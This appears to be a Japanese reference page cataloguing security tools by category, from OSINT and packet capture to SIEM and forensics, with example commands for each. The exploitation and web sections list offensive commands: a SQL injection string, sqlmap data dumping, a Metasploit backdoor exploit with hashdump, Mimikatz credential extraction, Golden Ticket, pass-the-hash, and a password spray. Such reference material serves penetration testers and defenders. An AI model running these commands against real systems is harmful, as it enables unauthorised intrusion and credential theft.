Maltego
有料グラフィカルなリンク分析ツール。人物・組織・インフラの関係性を可視化。
Tools & Resources
ツール・リソース
セキュリティプロフェッショナルが使用するカテゴリ別ツール一覧。 カードをクリックすると使用方法と公式サイトリンクが表示されます。
🔍
OSINT・情報収集
6 ツールtheHarvester
無料ドメインに関連するメールアドレス・サブドメイン・IPを収集するCLIツール。
LinuxmacOS
メールサブドメイン
使用方法を見る
使用方法
対象ドメインに対してGoogle・Bing・Hunter.io等の複数ソースからメールアドレス・サブドメイン・IP・バーチャルホストを一括収集します。Kali Linuxにプリインストール済み。収集結果はHTML/XMLで出力可能です。
コマンド例
# 基本的な使用方法(Google + Bing からドメイン情報を収集)
theHarvester -d example.com -b google,bing -l 200
# LinkedIn からメールアドレスを収集
theHarvester -d example.com -b linkedin -l 100
# 全ソースを使用してHTML出力
theHarvester -d example.com -b all -f output.htmlShodan
有料インターネット接続デバイスを検索できるサーチエンジン。IoT・脆弱なシステムの発見に使用。
Web
IoTスキャン
使用方法を見る
使用方法
Webインターフェースまたは公式CLIツール(shodan)で検索クエリを実行します。フィルター演算子を組み合わせて、特定の組織・国・ポートで絞り込み検索が可能。APIキーを取得すればCLIやPythonライブラリからも利用できます。
コマンド例
# CLIツールのインストールと初期設定
pip install shodan
shodan init YOUR_API_KEY
# 特定ポートが開いているIPを検索
shodan search "port:22 country:JP" --fields ip_str,port,org
# 特定組織のデバイスを検索
shodan search "org:\"Example Corp\"" --limit 100Recon-ng
無料モジュール式OSINT偵察フレームワーク。Metasploitライクなインターフェース。
LinuxmacOS
偵察フレームワーク
使用方法を見る
使用方法
インタラクティブコンソールで操作します。Workspaceを作成し、moduleをロードして対象ドメインを設定→run で実行。収集データはWorkspaceのデータベースに蓄積され、report/htmlモジュールでレポート出力できます。
コマンド例
# 起動とワークスペース作成
recon-ng
workspaces create target_company
# ドメインからホストを探索するモジュールの使用
modules load recon/domains-hosts/bing_domain_web
options set SOURCE example.com
run
# 収集データをレポート出力
modules load reporting/html
options set FILENAME /tmp/report.html
runSpiderFoot
無料ドメイン・IP・メール等の自動OSINT収集ツール。200以上のデータソースを統合。
LinuxmacOSWindows
自動化偵察
使用方法を見る
使用方法
WebUIをローカルで起動し、スキャン対象(ドメイン・IP・メール等)を入力するだけで200以上のデータソースから自動的に情報を収集します。収集結果はグラフ・テーブルで可視化され、CSVやJSONでエクスポート可能です。
コマンド例
# WebUI を起動(デフォルト: http://127.0.0.1:5001)
python3 ./sf.py -l 127.0.0.1:5001
# CLIモードでスキャン実行
python3 ./sf.py -s example.com -t INTERNET_NAME -m sfp_dnsresolve,sfp_whois
# Docker での起動
docker run -p 5001:5001 spiderfoot/spiderfootCensys
有料インターネット上のデバイス・証明書・ドメインを検索できる研究者向けプラットフォーム。
Web
証明書スキャン
使用方法を見る
使用方法
WebインターフェースでIPアドレス・ドメイン・証明書を検索できます。Censysクエリ言語(CQL)を使って詳細なフィルタリングが可能。Python APIライブラリを使うとスクリプトから自動検索・収集もできます。
コマンド例
# Python ライブラリのインストール
pip install censys
# 証明書検索(特定ドメインを含む証明書を列挙)
python3 -c "from censys.search import CensysCerts; c = CensysCerts(); print(list(c.search('parsed.names: example.com')))"
# ホスト検索(APIキー設定後)
censys search 'services.port=443 and services.tls.certificates.leaf_data.subject.organization="Example"' --index-type hosts 🌐
ネットワーク解析
6 ツールNmap
無料ネットワーク探索とセキュリティ監査の標準ツール。ポートスキャン・OS検出・NSEスクリプト対応。
LinuxmacOSWindows
スキャンポート
使用方法を見る
使用方法
ターゲットIPまたはドメインを指定してポートスキャンを実行します。-sV でサービスバージョン、-O でOS情報を取得でき、-sC でデフォルトのNSEスクリプトを実行して脆弱性の初期調査も可能です。スキャン結果は -oA で複数形式で保存できます。
コマンド例
# ホスト探索(生存確認のみ)
nmap -sn 192.168.1.0/24
# サービス・OS検出 + デフォルトスクリプト
sudo nmap -sV -O -sC 192.168.1.100
# 全ポートスキャン(高速)
sudo nmap -sS -p- --min-rate 5000 192.168.1.100 -oA scan_result
# NSEスクリプトで脆弱性確認
nmap --script=vuln 192.168.1.100 -p 80,443Wireshark
無料ネットワークパケットをリアルタイムキャプチャ・解析するGUIツール。セキュリティ解析の定番。
LinuxmacOSWindows
パケット解析フォレンジクス
使用方法を見る
使用方法
GUIを起動してキャプチャするNICを選択し、パケットのリアルタイム収集を開始します。表示フィルター(Display Filter)でプロトコルやIPでの絞り込みが可能です。「Follow TCP Stream」でHTTP通信の内容を読み取れます。
コマンド例
# CLI版(tshark)でキャプチャをファイルに保存
sudo tshark -i eth0 -w capture.pcap
# HTTPトラフィックのみ表示(表示フィルター例)
# Wireshark のフィルターバーに入力:
http.request.method == "POST"
# tshark で特定フィールドを抽出
tshark -r capture.pcap -T fields -e http.host -e http.request.uri
# DNS クエリのみ抽出
tshark -r capture.pcap -Y "dns.qr == 0" -T fields -e dns.qry.nametcpdump
無料コマンドラインのパケットキャプチャツール。自動化・スクリプトとの連携に適している。
LinuxmacOS
CLIパケット
使用方法を見る
使用方法
指定したNICのトラフィックをキャプチャしてターミナルに表示またはpcapファイルに保存します。BPF(Berkeley Packet Filter)構文でフィルタリングが可能。サーバー上でのリモートキャプチャやcronによる定期キャプチャに適しています。
コマンド例
# 特定インターフェースをキャプチャしてpcap保存
sudo tcpdump -i eth0 -w /tmp/capture.pcap
# 特定ホスト・ポートのトラフィックのみ
sudo tcpdump -i eth0 host 192.168.1.100 and port 80 -A
# HTTPの平文ボディを表示(-l でバッファリング無効)
sudo tcpdump -i eth0 -A -s0 "tcp port 80" | grep -E "GET|POST|Host:|User-Agent:"
# DNSクエリのみキャプチャ
sudo tcpdump -i eth0 udp port 53 -l -nnZeek
無料高性能なネットワーク通信解析フレームワーク。SOC・NSMでの大規模ログ生成に使用。
LinuxmacOS
NSMIDS
使用方法を見る
使用方法
ライブトラフィックまたはpcapファイルを解析し、接続・DNS・HTTP・SSL等のプロトコルログをTSV形式で自動生成します。Zeekスクリプト(.zeek)で独自の検知ロジックを実装でき、SIEMへのログ転送にも適しています。
コマンド例
# pcapファイルをオフライン解析
zeek -r capture.pcap
# ライブキャプチャを開始
sudo zeek -i eth0 /usr/share/zeek/scripts/site/local.zeek
# 生成されたHTTPログの確認
cat http.log | zeek-cut ts id.orig_h id.resp_h uri status_code
# 特定の接続をDNSログから検索
cat dns.log | zeek-cut ts query answers | grep "malware"Suricata
無料高性能なIDS/IPS・ネットワークセキュリティ監視エンジン。YAML設定でルールを柔軟に管理。
LinuxmacOSWindows
IDSIPS
使用方法を見る
使用方法
ルールファイル(.rules)を設定してIDSモードまたはIPSモードで動作させます。Suricata Emerging Threats(ET)ルールセットを利用して既知の攻撃を自動検知でき、EVE JSONログ形式でELKスタックやSplunkへ転送可能です。
コマンド例
# IDSモードでライブ監視(アラートをコンソールに表示)
sudo suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata/
# pcapファイルをオフライン解析
sudo suricata -c /etc/suricata/suricata.yaml -r capture.pcap -l /tmp/logs/
# ルールセットの更新
sudo suricata-update
# アラートログの確認
cat /var/log/suricata/fast.log | grep "ALERT"Masscan
無料超高速インターネットスキャナー。数分で全IPv4アドレスのポートをスキャン可能。
LinuxmacOS
高速スキャンポート
使用方法を見る
使用方法
Nmap互換の構文で超高速ポートスキャンを実行します。--rate で送信レートを制御でき、大規模なネットワークの初期探索に適しています。発見したポートの詳細調査にはNmapと組み合わせるのが一般的です。
コマンド例
# サブネット全体の80・443ポートをスキャン
sudo masscan -p80,443 192.168.1.0/24 --rate=10000
# 全ポートを高速スキャン
sudo masscan -p1-65535 192.168.1.0/24 --rate=50000 -oG output.txt
# 除外IPを設定してスキャン
sudo masscan -p22,80,443 10.0.0.0/8 --rate=5000 --excludefile=exclude.txt 🕸️
Webセキュリティ
6 ツールBurp Suite
有料Webアプリセキュリティテストの統合プラットフォーム。Proxy・Scanner・Intruder等の機能を搭載。
LinuxmacOSWindows
ペンテストプロキシ
使用方法を見る
使用方法
ブラウザのプロキシを127.0.0.1:8080に設定し、Burp Suite Community Editionを起動します。Proxy→Interceptでリクエストを傍受・改ざんし、Repeaterで繰り返しテスト、Intruderでパラメータのブルートフォースが可能。CA証明書をインポートすることでHTTPS通信も傍受できます。
コマンド例
# CLI 起動(Kali Linux)
burpsuite &
# Burp の CA 証明書をエクスポート(HTTPS傍受に必要)
# ブラウザで http://burpsuite にアクセス → CA 証明書をダウンロード
# Firefox: 設定 → 証明書を表示 → インポート
# SQLi テスト例(Repeater でパラメータ変更)
# id=1 → id=1' OR '1'='1 → 全レコード取得を確認OWASP ZAP
無料オープンソースのWebアプリ脆弱性スキャナー。自動スキャンとインターセプトプロキシを搭載。
LinuxmacOSWindows
スキャンOWASP
使用方法を見る
使用方法
GUIモードでURLを入力して自動スパイダー&スキャンを実行するか、CLIモードでCI/CDパイプラインに組み込めます。能動的スキャンでSQLi・XSS・CSRF等の脆弱性を自動検出し、結果をHTML/JSONレポートで出力できます。
コマンド例
# CLI での自動スキャン(Docker 経由)
docker run -t ghcr.io/zaproxy/zaproxy:stable zap-baseline.py \
-t https://target.example.com -r zap_report.html
# API スキャン(OpenAPI 定義ファイルを使用)
docker run -t ghcr.io/zaproxy/zaproxy:stable zap-api-scan.py \
-t https://target.example.com/openapi.json -f openapi -r api_report.html
# ZAP をデーモンモードで起動(APIアクセス用)
zap.sh -daemon -port 8090 -host 127.0.0.1SQLmap
無料SQLインジェクション脆弱性の検出と悪用を自動化するツール。
LinuxmacOSWindows
SQLi自動化
使用方法を見る
使用方法
脆弱なパラメータを含むURLを指定するだけでSQLi検出から情報抽出まで自動化します。Burp Suiteのリクエストファイルをそのまま入力することも可能。--level/--risk でスキャン強度を調整できます。
コマンド例
# URLパラメータのSQLi検査
sqlmap -u "http://target/page.php?id=1" --dbs
# 特定DBのテーブル一覧を取得
sqlmap -u "http://target/page.php?id=1" -D dbname --tables
# テーブルのデータをダンプ
sqlmap -u "http://target/page.php?id=1" -D dbname -T users --dump
# Burp Suiteのリクエストファイルを使用
sqlmap -r request.txt --level=3 --risk=2Nikto
無料WebサーバーのCGI・設定ミス・既知の脆弱性をスキャンするオープンソースツール。
LinuxmacOS
スキャンWeb
使用方法を見る
使用方法
ターゲットのWebサーバーに対してHTTPリクエストを送信し、6,700以上のチェック項目でサーバーヘッダー・CGI・設定ミス・古いソフトウェアバージョンを検出します。-ssl オプションでHTTPS対応サイトもスキャン可能です。
コマンド例
# 基本スキャン
nikto -h http://target.example.com
# HTTPS サイトのスキャン
nikto -h https://target.example.com -ssl
# 特定ポートを指定してスキャン・HTML出力
nikto -h target.example.com -port 8080 -Format html -output nikto_report.html
# 特定チューニングでスキャン(1=ファイル・5=情報開示のみ)
nikto -h http://target.example.com -Tuning 1,5ffuf
無料超高速WebファジングツールGo製。ディレクトリ探索・パラメータファジングに対応。
LinuxmacOSWindows
ファジングディレクトリ
使用方法を見る
使用方法
URLの任意の位置に "FUZZ" キーワードを埋め込み、ワードリストを指定して高速ファジングを実行します。ディレクトリ探索・サブドメイン探索・パラメータファジング・POST bodyファジングに対応。フィルター(-fc/-fs/-fl)でノイズを除去できます。
コマンド例
# ディレクトリ探索(404を除外)
ffuf -u http://target.example.com/FUZZ -w /usr/share/wordlists/common.txt -fc 404
# サブドメイン探索
ffuf -u http://FUZZ.example.com -w subdomains.txt -H "Host: FUZZ.example.com"
# POSTパラメータのファジング
ffuf -u http://target.example.com/login -X POST -d "user=admin&pass=FUZZ" \
-w passwords.txt -fc 302
# 拡張子を指定してファイル探索
ffuf -u http://target.example.com/FUZZ -w wordlist.txt -e .php,.html,.txtGobuster
無料URI・DNSサブドメイン・Webコンテンツのディレクトリブルートフォースツール。
LinuxmacOSWindows
ブルートフォースディレクトリ
使用方法を見る
使用方法
dir・dns・vhostモードで用途に応じたブルートフォースを実行します。-t でスレッド数を調整して高速化できます。ffufより設定がシンプルで、初心者がディレクトリ探索を始めるのに適したツールです。
コマンド例
# ディレクトリ探索
gobuster dir -u http://target.example.com -w /usr/share/wordlists/dirb/common.txt
# DNSサブドメイン探索
gobuster dns -d example.com -w subdomains.txt -t 50
# 特定拡張子のファイルを探索
gobuster dir -u http://target.example.com -w wordlist.txt -x php,html,txt -t 40
# 認証が必要なサイトへのアクセス
gobuster dir -u http://target.example.com -w wordlist.txt -U username -P password ⚔️
エクスプロイト・ペンテスト
6 ツールMetasploit Framework
無料ペネトレーションテスト用の世界標準フレームワーク。多数のエクスプロイトモジュールを搭載。
LinuxmacOSWindows
エクスプロイトフレームワーク
使用方法を見る
使用方法
msfconsole を起動し、search コマンドで脆弱性を検索してモジュールをロードします。RHOSTS(ターゲット)・LHOST(自分のIP)等のオプションを設定してrun/exploit を実行。Meterpreterセッションを取得後は高度な後処理が可能です。必ず許可を得た環境でのみ使用してください。
コマンド例
# msfconsole の起動
msfconsole
# エクスプロイトの検索と使用
search vsftpd 2.3.4
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.101
run
# Meterpreter セッション取得後の操作
sysinfo
getuid
hashdumpKali Linux
無料セキュリティ・ペネトレーションテスト特化のLinuxディストリビューション。600以上のツールを収録。
Linux
OSペンテスト
使用方法を見る
使用方法
VirtualBoxやVMware用のOVAイメージをダウンロードしてインポートするか、公式ISOからブータブルUSBを作成します。デフォルトユーザー: kali / パスワード: kali。ターミナル・Burp Suite・Metasploit等が最初からインストール済みです。
コマンド例
# VM イメージのダウンロード後、起動して最新化
sudo apt update && sudo apt full-upgrade -y
# ツールのカテゴリ別確認
kali-menu
# 追加ツールのインストール(例: impacket)
sudo apt install python3-impacket -y
# Kali の Python 環境確認
python3 --version && pip3 list | grep -i "metasploit\|impacket"Cobalt Strike
有料高度な脅威エミュレーションプラットフォーム。レッドチーム演習で広く使用(商用)。
LinuxmacOSWindows
C2レッドチーム
使用方法を見る
使用方法
Team ServerをLinuxに立ち上げ、Windows版クライアントから接続して使用します。リスナーを作成してペイロード(Beacon)を生成し、標的に実行させてセッションを確立。Aggressor Scriptで自動化や拡張が可能です。ライセンス購入・正式な許可が必要です。
コマンド例
# Team Server の起動(Linux)
./teamserver [IP] [パスワード] [malleable-profile]
# クライアントから接続後の操作(Cobalt Strike コンソール)
# リスナーを作成: Listeners → Add → HTTP/HTTPS/DNS
# ペイロード生成: Attacks → Packages → Windows Executable
# Beacon コマンド例(セッション確立後)
sleep 30 # ビーコン間隔を30秒に設定
shell whoami # システムコマンド実行
ps # プロセス一覧の取得Impacket
無料Windowsネットワークプロトコル操作用Pythonライブラリ。SMB・Kerberos・LDAP等に対応。
LinuxmacOS
Windowsプロトコル
使用方法を見る
使用方法
PythonベースのCLIスクリプト群として使用します。secretsdump.pyでSAMデータベースやDCからクレデンシャルを抽出、wmiexec.pyやpsexec.pyでリモートコマンド実行、GetUserSPNs.pyでKerberoastingが可能です。
コマンド例
# SAMデータベースからハッシュを抽出
python3 secretsdump.py DOMAIN/user:pass@192.168.1.100
# WMI経由でリモートコマンド実行
python3 wmiexec.py DOMAIN/user:pass@192.168.1.100 "whoami"
# Kerberoasting(SPNを持つアカウントのチケット取得)
python3 GetUserSPNs.py DOMAIN/user:pass -dc-ip 192.168.1.1 -request
# Pass-the-Hash でリモート実行
python3 psexec.py -hashes :NTLMHASH DOMAIN/Admin@192.168.1.100Mimikatz
無料Windowsの認証情報(パスワード・ハッシュ・チケット)を抽出するツール(教育・検証用途)。
Windows
Windowsクレデンシャル
使用方法を見る
使用方法
管理者権限で実行し、LSASSプロセスからメモリ上の認証情報を抽出します。ペネトレーションテストのポスト・エクスプロイテーション段階で、ラテラルムーブメントのためのクレデンシャル収集に使用されます。教育・検証目的にのみ使用してください。
コマンド例
# privilege を取得して LSASS から認証情報を抽出
privilege::debug
sekurlsa::logonpasswords
# SAM からローカルハッシュを抽出
lsadump::sam
# Golden Ticket の作成
kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-... /krbtgt:HASH /ticket:golden.kirbi
# Pass-the-Hash
sekurlsa::pth /user:Admin /domain:DOMAIN /ntlm:HASH /run:cmd.exeCrackMapExec
無料Windowsインフラの評価に特化した多目的ペネトレーションテストツール。
LinuxmacOS
Windowsラテラルムーブ
使用方法を見る
使用方法
SMB・SSH・LDAP・WinRM等のプロトコルを通じてWindowsネットワークの評価を行います。クレデンシャルのスプレーや接続確認、SAMダンプ、シェル実行など多彩な機能を持ちます。NetExecリポジトリが後継プロジェクトとして活発に開発中です。
コマンド例
# 認証情報でSMB接続確認(サブネット全体)
cme smb 192.168.1.0/24 -u user -p password
# パスワードスプレー攻撃
cme smb 192.168.1.0/24 -u users.txt -p "Summer2024!"
# SAM データベースのダンプ
cme smb 192.168.1.100 -u Admin -p pass --sam
# リモートコマンド実行
cme smb 192.168.1.100 -u Admin -p pass -x "whoami /all" 🔬
フォレンジクス・マルウェア解析
6 ツールAutopsy
無料デジタルフォレンジクスプラットフォーム。ディスクイメージ解析・タイムライン生成・キーワード検索対応。
WindowsLinuxmacOS
フォレンジクスディスク解析
使用方法を見る
使用方法
GUIで新規ケースを作成し、ディスクイメージ(E01・dd等)やUSBデバイスをデータソースとして追加します。自動解析モジュールが削除ファイル復元・ブラウザ履歴・レジストリ解析を自動実行し、タイムラインビューで事象の経緯を把握できます。
コマンド例
# Autopsy は主に GUI で操作します
# Linux では以下のコマンドで起動
sudo /usr/share/autopsy/autopsy
# CLI ツール(The Sleuth Kit)でファイルシステムを解析
mmls disk.dd # パーティションテーブルの表示
fls -r -o 2048 disk.dd # ファイル一覧の再帰表示
icat disk.dd 512 > recovered_file # inode番号でファイル抽出
# 削除ファイルの一覧表示
fls -rd -o 2048 disk.dd | grep -v "r/r"Volatility
無料メモリフォレンジクスの標準フレームワーク。Windowsプロセス・ネットワーク接続・マルウェアの解析が可能。
LinuxmacOSWindows
メモリ解析フォレンジクス
使用方法を見る
使用方法
メモリダンプファイル(.dmp / .mem等)に対してプラグインを実行します。まずimage info でOSプロファイルを特定し、pslist・cmdline・netscan・malfind等のプラグインで不審なプロセス・接続・注入コードを探索します。
コマンド例
# Volatility 3 でプロセス一覧を表示
python3 vol.py -f memory.dmp windows.pslist
# ネットワーク接続の確認
python3 vol.py -f memory.dmp windows.netscan
# コマンドライン引数の確認(マルウェアの実行引数を解析)
python3 vol.py -f memory.dmp windows.cmdline
# プロセスインジェクションの検出
python3 vol.py -f memory.dmp windows.malfind
# 特定プロセスからファイルをダンプ
python3 vol.py -f memory.dmp windows.dumpfiles --pid 1234Ghidra
無料NSA開発のオープンソース逆アセンブラ。Windows/Linux/macOS実行ファイルの静的解析に対応。
LinuxmacOSWindows
リバースエンジニアリング静的解析
使用方法を見る
使用方法
プロジェクトを作成してバイナリファイルをインポートし、Auto Analyzeを実行します。CodeBrowserでアセンブリとデコンパイル結果を同時表示でき、関数・変数に意味のある名前を付けながら解析を進めます。Pythonスクリプトで解析を自動化することも可能です。
コマンド例
# GUIの起動(JDK 17以上が必要)
./ghidraRun
# CLI でヘッドレス解析(バッチ処理向け)
./analyzeHeadless /path/to/project ProjectName \
-import /path/to/malware.exe -postScript PrintTree.py
# Ghidra スクリプトでコメントを追加(Python API)
# currentProgram.getListing().getCodeUnitAt(addr).setComment(...)IDA Pro
有料業界標準のインタラクティブ逆アセンブラ。高度なマルウェア解析・エクスプロイト開発に使用(商用)。
LinuxmacOSWindows
リバースエンジニアリングマルウェア
使用方法を見る
使用方法
バイナリを開いて自動解析後、関数グラフ・クロスリファレンス・デコンパイラ(Hex-Rays)を使って解析します。IDAPython/IDCスクリプトで繰り返し処理を自動化でき、プラグイン(FLIRT・Lumina等)で解析精度を向上できます。IDA Free(無料版)は64bitバイナリのみ対応。
コマンド例
# GUIで起動してバイナリを開く
./ida64 malware.exe
# IDAPython スクリプトの実行例
# File → Script command または Alt+F7
# 関数の自動コメント生成(IDAPython)
for func in Functions():
SetFunctionCmt(func, "Auto-labeled", False)
# Hex-Rays デコンパイラ(F5)でC言語相当のコードを表示ANY.RUN
有料インタラクティブなオンラインマルウェアサンドボックス。疑わしいファイルを安全に実行して動作解析。
Web
サンドボックスマルウェア
使用方法を見る
使用方法
ブラウザ上でファイル(EXE・PDF・Officeドキュメント等)またはURLを指定して分析を開始します。リアルタイムにプロセスツリー・ネットワーク通信・レジストリ変更を観察でき、MITRE ATT&CKへのマッピングと脅威スコアが自動生成されます。無料プランでは公開分析のみ可能。
コマンド例
# API を使ってサンドボックスに提出
curl -X POST https://api.any.run/v1/analysis \
-H "Authorization: API-Key YOUR_KEY" \
-F "file=@malware.exe" \
-F "env_os=windows" \
-F "env_bitness=64"
# 分析結果の取得
curl https://api.any.run/v1/analysis/{task-id} \
-H "Authorization: API-Key YOUR_KEY"Cuckoo Sandbox
無料オープンソースの自動マルウェア解析システム。ローカル環境に構築してファイルの動的解析が可能。
Linux
サンドボックス自動化
使用方法を見る
使用方法
ホストOS(Ubuntu等)にCuckooをインストールし、VirtualBox上のWindowsゲストVMをサンドボックスとして設定します。サンプルを提出するとゲストVM上で自動実行され、API呼び出し・ネットワーク通信・ファイル変更をレポートとして出力します。
コマンド例
# マルウェアサンプルを提出
cuckoo submit /path/to/malware.exe
# URLを解析対象として提出
cuckoo submit --url http://malicious.example.com
# Cuckoo Web UI の起動
cuckoo web runserver 0.0.0.0:8080
# 完了したタスクのレポートを確認
ls ~/.cuckoo/storage/analyses/ 🛡️
セキュリティ監視・防御
6 ツールSplunk
有料大規模ログ収集・分析・可視化プラットフォーム。SOCでのSIEM用途に最も広く使用(商用)。
LinuxmacOSWindows
SIEMログ分析
使用方法を見る
使用方法
Universal Forwarderでエンドポイントからログを収集し、Splunk Search & Reporting AppでSPL(Search Processing Language)クエリを実行します。ダッシュボード・アラート・相関ルールを作成してセキュリティ監視を自動化できます。無料版は日次500MBまで取り込み可能です。
コマンド例
# 基本的なSPL クエリ例(Splunk検索バーに入力)
index=main sourcetype=access_log status=404 | stats count by clientip | sort -count
# SSHブルートフォースの検出
index=linux_secure "Failed password" | rex "from (?P<src_ip>\d+\.\d+\.\d+\.\d+)" \
| stats count by src_ip | where count > 10
# タイムチャートでのトラフィック可視化
index=network | timechart span=5m count by actionElastic SIEM
有料Elasticsearch/Kibanaベースのオープンソース寄りSIEM。MITRE ATT&CKマッピング対応。
LinuxmacOSWindows
SIEMElastic
使用方法を見る
使用方法
Elastic AgentまたはFilebeatでログを収集しElasticsearchに保存。Kibana Security AppでTimeline(インシデント調査)・Detection Rules(MITRE ATT&CK準拠)・Alert管理が可能です。KQL(Kibana Query Language)またはEQLで高度な脅威検出クエリを記述できます。
コマンド例
# EQL で不審なPowerShellを検出
process where process.name == "powershell.exe" and \
process.args : ("*-enc*", "*-EncodedCommand*", "*bypass*")
# KQL クエリ例(Kibana Discover に入力)
event.category: "process" and process.name: "cmd.exe" and user.name: "SYSTEM"
# Filebeat でNginxログを取り込む設定(filebeat.yml)
# filebeat.inputs:
# - type: filestream
# paths: ["/var/log/nginx/access.log"]Wazuh
無料オープンソースの統合セキュリティプラットフォーム。SIEM・FIM・脆弱性管理・EDRを統合。
LinuxmacOSWindows
SIEMEDRFIM
使用方法を見る
使用方法
Wazuh Manager(サーバー)にWazuh Agentをエンドポイントにインストールして接続します。Kibana上のWazuh Dashboardでアラート・脆弱性・FIM(ファイル整合性監視)・コンプライアンス状況を一元管理できます。Docker Composeでの一括インストールが最も簡単です。
コマンド例
# Docker Compose で一括インストール(推奨)
git clone https://github.com/wazuh/wazuh-docker.git
cd wazuh-docker/single-node
docker compose up -d
# エージェントのインストール(Debian/Ubuntu)
curl -so wazuh-agent.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/...
sudo WAZUH_MANAGER="manager_ip" dpkg -i wazuh-agent.deb
sudo systemctl start wazuh-agent
# ルールファイルの確認
sudo cat /var/ossec/ruleset/rules/0015-ossec_rules.xml | head -50Snort
無料世界で最も広く展開されているオープンソースIDS/IPS。シグネチャベースの侵入検知。
LinuxmacOSWindows
IDSIPS
使用方法を見る
使用方法
ルールファイル(.rules)を設定してIDSモードで監視を開始します。Snort 3では設定がLuaベースに刷新され、高性能かつ柔軟なルール記述が可能です。Snortルールセットの更新には Pulledpork や oinkmaster を使用します。
コマンド例
# IDSモードで起動(アラートをコンソールに出力)
sudo snort -c /etc/snort/snort.conf -i eth0 -A console
# パケットのログ取得モード(pcap形式で保存)
sudo snort -c /etc/snort/snort.conf -i eth0 -l /var/log/snort/
# pcapファイルをオフライン解析
sudo snort -c /etc/snort/snort.conf -r capture.pcap -A console
# カスタムルールのテスト
sudo snort -c /etc/snort/snort.conf -T # 設定検証OpenVAS
無料オープンソースの脆弱性スキャナー。Greenbone Security Managerの無償版コンポーネント。
Linux
脆弱性スキャン資産管理
使用方法を見る
使用方法
Greenbone Community Edition(Docker版が最も簡単)をインストールし、Webインターフェース(localhost:9392)からスキャンタスクを作成・実行します。定期スキャンのスケジューリング・PDF/CSVレポート出力・CVSS スコアによる優先付けが可能です。
コマンド例
# Docker Compose でインストール(推奨)
docker compose -f docker-compose.yml -p greenbone-community-edition up -d
# 初回フィード更新(数分〜数時間かかる)
docker compose -p greenbone-community-edition \
exec -u gvmd gvmd gvmd --rebuild --progress
# GVM CLIでスキャン実行
gvm-cli --gmp-username admin --gmp-password admin socket --xml \
"<create_task><name>Quick Scan</name>...</create_task>"Velociraptor
無料エンドポイントフォレンジクス・インシデント対応・ハンティング用オープンソースツール。
LinuxmacOSWindows
EDRハンティングフォレンジクス
使用方法を見る
使用方法
サーバー(Velociraptor Server)とクライアント(Velociraptor Agent)で構成。VQLクエリ言語でエンドポイントから情報を収集・分析します。Huntで複数エンドポイントへの同時クエリ実行、ArtifactでOSINT/フォレンジクス手順の標準化が可能です。
コマンド例
# ローカル実行モード(単一エンドポイント調査)
velociraptor gui
# VQL クエリの直接実行
velociraptor query "SELECT * FROM pslist()"
# 実行中プロセスのネットワーク接続を確認
velociraptor query "SELECT Pid, Name, Laddr, Raddr FROM netstat()"
# サーバーの起動(設定ファイル生成後)
velociraptor config generate -i
velociraptor --config server.config.yaml frontend -v